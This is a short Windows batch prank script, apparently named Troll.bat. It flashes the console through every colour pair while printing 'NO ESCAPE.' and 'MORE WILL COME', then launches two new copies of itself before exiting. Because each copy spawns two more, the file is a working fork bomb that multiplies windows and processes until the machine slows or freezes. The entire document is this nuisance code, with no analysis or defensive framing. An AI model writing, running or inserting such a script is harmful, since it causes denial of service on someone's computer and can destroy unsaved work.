@echo off
color 4f
echo NO ESCAPE.
timeout 1 >nul
cls
set NUM=0 1 2 3 4 5 6 7 8 9 A B C D E F
:start
for %%x in (%NUM%) do ( 
    for %%y in (%NUM%) do (
        color %%x%%y
	echo MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME MORE WILL COME
    )
)
cls
color 4f
echo PREPARE FOR MORE
timeout 1 >nul
cd "%~dp0"
start "New Window" cmd /c "Troll.bat"
start "New Window" cmd /c "Troll.bat"
exit